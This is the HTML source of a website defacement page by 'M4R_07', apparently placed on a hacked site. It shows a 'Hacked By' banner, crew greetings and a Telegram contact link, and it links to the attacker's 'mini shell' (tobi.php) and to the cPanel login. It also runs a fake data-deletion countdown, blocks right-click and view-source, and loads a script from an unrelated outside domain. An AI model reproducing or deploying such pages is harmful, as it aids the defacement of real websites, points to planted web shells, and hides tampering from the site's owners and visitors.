<html>

<head>
<title>.:: Hacked By:  M4R_07::.[#]</title>


<link rel="shortcut icon" href="https://64.media.tumblr.com/2125f2450dcca2011aa6f52dafce6b1f/tumblr_inline_mwrvv9sxXG1r0jzp4.png">

<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>

<meta charset="utf-8">

<meta name="og:description" content="Heh...just for fun!!!">

<meta property="og:image" content="https://64.media.tumblr.com/2125f2450dcca2011aa6f52dafce6b1f/tumblr_inline_mwrvv9sxXG1r0jzp4.png>

 <!-- sweetalert2

        #### jangan di ganti ####-->

        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>

        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@9"></script>

        <script src="https://www.ctwood.com.sg/style/alert.js"></script>

<! -- Salju -->

<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script> 

<! -- Keluarga gw :v -->

<link href="https://fonts.googleapis.com/css2?family=Teko&display=swap" rel="stylesheet" type='text/css'> 

<link href="https://fonts.googleapis.com/css?family=Indie+Flower" rel="stylesheet" type='text/css'>

<link href="https://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet" type='text/css'>

<link href="https://fonts.googleapis.com/css2?family=Iceland&display=swap" rel="stylesheet" type='text/css'> 

<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">

<body bgcolor="black" </body>

<! -- Background gw mank -->

<style type="text/css"> body <center>{ background: #0a0a0a; height: 100vh; width: 100%; margin: 0; padding: 12px; display: flex; flex-direction: column; justify-content: center; align-items: center; background: linear-gradient(rgba(20, 10, 10, 0.3), rgba(0, 0, 0, 0.3)), repeating-linear-gradient(0, transparent, transparent 4px, black 10px, black 2px); background-size: cover; background-position: center; } </center></style> 

<style>

<!-- style login shell -->

	<style type=text/css >

    .tombol{

  background:#2C97DF;

  color:white;

  border-top:0;

  border-left:0;

  border-right:0;

  border-bottom:5px solid #2A80B9;

  padding:10px 20px;

  text-decoration:none;

  font-family:sans-serif;

  font-size:22pt;

  

}

h2{

	font-family:Share Tech Mono;

	font-size:30px;

	}

input[type=password] {

	border: 1px solid #15CFF4;

	width: 300px;

	height: 25px;

	padding-left: 5px;

	margin: 10px auto;

	resize: none;

	background: transparent;

	color: gold;

	font-family:Share Tech Mono;

	font-size: 13px;

}

.page{

    		position: absolute;

    		margin: auto;

    		height: 50%;

    		top: 0; bottom: 0; left: 0; right:0;

     	}

  .blink_text {

-webkit-animation-name: blinker;

-webkit-animation-duration: 2s;

-webkit-animation-timing-function: linear;

-webkit-animation-iteration-count: infinite;



-moz-animation-name: blinker;

-moz-animation-duration: 2s;

-moz-animation-timing-function: linear;

-moz-animation-iteration-count: infinite;



 animation-name: blinker;

 animation-duration: 2s;

 animation-timing-function: linear;

 animation-iteration-count: infinite;



 color: red;

}

@-moz-keyframes blinker { 

 0% { opacity: 5.0;

 }

 50% { opacity: 0.0;

 }

 100% { opacity: 5.0;

 }

 }

@-webkit-keyframes blinker { 

 0% { opacity: 5.0;

 }

 50% { opacity: 0.0;

 }

 100% { opacity: 5.0;

 }

 }

@keyframes blinker { 

 0% { opacity: 5.0;

 }

 50% { opacity: 0.0;

 }

 100% { opacity: 5.0;

 }

 }

 

 #copy {

 	color: lime;

 	font-weight: bold;

 	font-family: Kelly Slab;

 }

 #copy a {

 	color: white;

 }

 #copy a:hover {

 	color: blue;

 }



body{

font-family: Kelly Slab;

background-color: black;

color:white;

}

#content tr:hover{

background-color: blue;

text-shadow:0px 0px 10px #fff;

}

#content .first{

background-color: #15CFF4;

}

table{

border: 1px #000000;

}

.s_tb{

border:1px silver;

}

a{

color:white;

font-size: 19px;

text-decoration:none;

}

a:hover{

color:green;

text-shadow:0px 0px 10px #ffffff;

}

input,select,textarea{

border: 2px #000000 solid;

-moz-border-radius: 5px;

-webkit-border-radius:5px;

border-radius:5px;

}

h2{

font-family:Kelly Slab;

font-size:25px;

color:white;

}

h3{

font-size:35px;

}

h4{

font-size:15px;

font-family:Kelly Slab;

color:white;

}

.arif_table {;

	background:transparent;

	border:1px solid blue;

	font-family:Share Tech Mono;

    display:inline-block;

	cursor:pointer;

	color:#15CFF4;

	font-size:19x;

	font-weight:bold;

	padding:3px 20px;

	text-decoration:none;

	text-shadow:0px -1px 0px white;

       }

       .arif_table {;

	background:transparent;

	border:2px solid silver;

	font-family:Share Tech Mono;

	color:white;

	font-size:18x;

	font-weight:bold;

	padding:3px 29px;

	text-decoration:none;

	text-shadow:0px 0px 20px #15CFF4;

       }

     .potext {

	border: 1px solid #ffffff;

	width: 100%;

	height: 400px;

	padding-left: 5px;

	margin: 10px auto;

	resize: none;

	background: transparent;

	color: #ffffff;

	font-family:Share Tech mono;

	font-size: 13px;

}



    </style>

  <!-- javascript sweet alrt -->

    <script type="text/javascript" >

                  



                          function logcpanel(){

        	        Swal.fire({

  title: 'Login cpanel website stah?',

  icon: '',

  iconHtml: '?',

  confirmButtonText: 'Iya',

  cancelButtonText: 'Kgk,cpanel gw udh banyak',

  showCancelButton: true,

  showCloseButton: true

}).then((result) => {

        if (result.value) {

        location.replace(":2080");

        }

      })

        	    }



function cpanel(){

        	        Swal.fire({

  title: 'want to contact M4R_07 ? ',

  icon: '',

  iconHtml: '?',

  confirmButtonText: 'yes',

  cancelButtonText: 'no',

  showCancelButton: true,

  showCloseButton: true

}).then((result) => {

        if (result.value) {

        location.replace("https://t.me/MARCHLORIC");

        }

      })

        	    }

        

        	    function mini(){

        	        Swal.fire({

  title: 'Apakah ingin Menuju Mini shell Gw?',

  icon: '',

  iconHtml: '?',

  confirmButtonText: 'iya dong',

  cancelButtonText: 'Kepencet :v',

  showCancelButton: true,

  showCloseButton: true

}).then((result) => {

        if (result.value) {

        location.replace("tobi.php");

        }

      })

        	    }



function hapus(){

let timerInterval

Swal.fire({

  title: 'Hapus Data!',

  icon: 'warning',

  html: 'Sedang Menghapus <b></b> gb',

  timer: 20000,

  timerProgressBar: false,

  onBeforeOpen: () => {

    Swal.showLoading()

    timerInterval = setInterval(() => {

      Swal.getContent().querySelector('b')

        .textContent = Swal.getTimerLeft()

    }, 100)

  },

  onClose: () => {

    clearInterval(timerInterval)

  }

}).then((result) => {

  if (

    /* Read more about handling dismissals below */

    result.dismiss === Swal.DismissReason.timer,

    swal.fire({

        

      title: 'Data anda',

      text: 'Ga di apa2 in :v',

       icon: 'success',

       showConfirmButton: false,

      

       

    })

  

  ){

    console.log('I was closed by the timer') // eslint-disable-line

  }

})

}



function ip(){

const ipAPI = 'https://api.ipify.org?format=json'



Swal.queue([{

  title: 'Perlihatkan ip ku',

  confirmButtonText: 'Show my IP',

  text:

    'ini hanya untuk memperlihatkan ' +

    'ip saja (Aman)',

  showLoaderOnConfirm: true,

  preConfirm: () => {

    return fetch(ipAPI)

      .then(response => response.json())

      .then(data => Swal.insertQueueStep(data.ip))

      .catch(() => {

        Swal.insertQueueStep({

          icon: 'error',

          title: 'maaf tidak bisa menampilkan ip anda'

        })

      })

  }

}])

}

    </script>

<! --- tombol lagu -- !>

<style type="text/css">

.lagu{

     background:transparent;

	border:2px solid silver;

	font-family:Share Tech Mono;

	color:white;

	font-size:18x;

	font-weight:bold;

	padding:3px 29px;

	text-decoration:none;

	text-shadow:0px 0px 20px #15CFF4;

  }

</style>

<! -- script lagu -- !>

<script> function play(){ var audio = document.getElementById('lagu'); audio.play(); } function liat(){ document.getElementById('galiat').style.visibility='visible'; } 

</script>

<! -- efek glitch/error2 -->

<style>h3{

       color: #000000; text-decoration: none; border-radius:0px; border:0px;margin:0px; padding:0px; animation:jembot 0.5s linear infinite;

       }

        @keyframes

         jembot{

          2%{color:white;}3%{transform:translate(2px,-10px) skewX(3500deg);}5%{transform:translate(0px,0px) skewX(0deg);}2% , 54%{transform:translateX(0px) skew(0deg);}55%{transform:translate(-2px,6px) skew(-5530deg);}56%{transform:translate(0px,0px) skew(0deg);}57%{transform:translate(4px,-10px) skew(-70deg);}58%{transform:translate(0px,0px) skew(0deg);}62%{transform:translate(0px,20px) skew(0deg);}63%{transform:translate(4px,-2px) skew(0deg);}90%{transform:translate(1px,3px); skew(-230deg);}95%{transform:translate(-7px,2px); skew(-120deg);}100%{transform:translate(0px,0px) skew(0deg);}

    </style>

<! -- Border atas -->

<center>



 <p class="text"style="font-size:45px;color: white;text-shadow: 0px 0px 20px #00ffff , 0px 0px 20px #00ffff;font-family:Share Tech Mono;">Hacked

<style="font-size:45px;color: #00ffff;text-shadow: 0px 0px 29px white , 0px 0px 29px white;font-family:Share Tech Mono;"> By M4R_07</p>

<br> 

<! -- Gambar tengah -->

<! --  jam -->

<div id="clock" class="text" style="color: red; font-family: Kelly+Slab; font-size: 51px;"></div>

<! -- Code jam -->

<script type="text/javascript">

    <!--

    function showTime() {

        var a_p = "";

        var today = new Date();

        var curr_hour = today.getHours();

        var curr_minute = today.getMinutes();

        var curr_second = today.getSeconds();

        if (curr_hour < 24) {

            a_p = "";

        } else {

            a_p = "";

        }

        if (curr_hour == 0) {

            curr_hour = 24;

        }

        if (curr_hour > 24) {

            curr_hour = curr_hour - 24;

        }

        curr_hour = checkTime(curr_hour);

        curr_minute = checkTime(curr_minute);

        curr_second = checkTime(curr_second);

     document.getElementById('clock').innerHTML=curr_hour + " : " + curr_minute + " : " + curr_second + " " + a_p;

        }

 

    function checkTime(i) {

        if (i < 10) {

            i = "0" + i;

        }

        return i;

    }

    setInterval(showTime, 500);

    //-->

    </script>

    <center>        

        <ext class="flash animated">

            <div class="ext">

         <center><img src="https://64.media.tumblr.com/2125f2450dcca2011aa6f52dafce6b1f/tumblr_inline_mwrvv9sxXG1r0jzp4.png" height="400" width="400" /></center>
<! -- Tombol2 -- !>

<button class="lagu" onclick="play();liat();"><font face="Teko" size="5" color="white" >PLAY MUSIC</font></button><audio id="lagu" src="https://ringtonelly.com/mp3/2022_09_30_08_17_39_DEATH-BED-SONG-RINGTONE.mp3"></audio><br>
                 <p class="blink_text" style="font-size:18px;color: aqua;text-shadow: 10px 10px 20px #00ffff font-family:Iceland;">___________________________________________________</font><br>
                <p class="text" style="font-size:18px;color: white;text-shadow: 10px 10px 20px #00ffff font-family:Iceland;">Thank to : </font><br><br>
                	
<marquee width="50%" behavior="alternate" ><font face="Kelly Slab" size="4px"color=white style="text-shadow:1px 1px 50px aqua , 0px 0px 20px aqua
;" >|   M4R_07 | | CKS | | TD |</font></marquee>
                 <p class="blink_text" style="font-size:18px;color: aqua;text-shadow: 10px 10px 20px #00ffff font-family:Iceland;">___________________________________________________</font><br>
<br>

<button class="arif_table" onclick="cpanel()"> By : M4R_07</button></td></table></p>

   <script>

            var message="REMEMBER IT'S M4R_07"

            var neonbasecolor="white"

            var neontextcolor="aqua"

            var neontextcolor2="aqua"

            var flashspeed=100                                             

            var flashingletters=3  

            var flashingletters2=2

            var flashpause=1     

            var n=0

            if (document.all||document.getElementById){

              document.write('<font color="'+neonbasecolor+'">')

              for (m=0;m<message.length;m++)

                document.write('<span id="neonlight'+m+'">'+message.charAt(m)+'</span>')

              document.write('</font>')

              }else

                document.write(message)

             function crossref(number){

               var crossobj=document.all? eval("document.all.neonlight"+number) : document.getElementById("neonlight"+number)

               return crossobj

              }

             function neon(){

             //Change all letters to base color

               if (n==0){

                 for (m=0;m<message.length;m++)

                   crossref(m).style.color=neonbasecolor

               }

              //cycle through and change individual letters to neon color

              crossref(n).style.color=neontextcolor

              if (n>flashingletters-1) 

	            crossref(n-flashingletters).style.color=neontextcolor2

              if (n>(flashingletters+flashingletters2)-1) 

	            crossref(n-flashingletters-flashingletters2).style.color=neonbasecolor

              if (n<message.length-1)

                n++

             else{

               n=0

               clearInterval(flashing)

               setTimeout("beginneon()",flashpause)

               return

             }

          }

         function beginneon(){

           if (document.all||document.getElementById)

             flashing=setInterval("neon()",flashspeed)

         }

         beginneon()

</script>

<br>

     <br>

		<br>

	       <br>

		<br>

	<br>

     



 

<script type='text/javascript'>

//<![CDATA[

shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="http://google.com"});

//]]>

</script>
<! -- script alert2 -->

' ))</script>
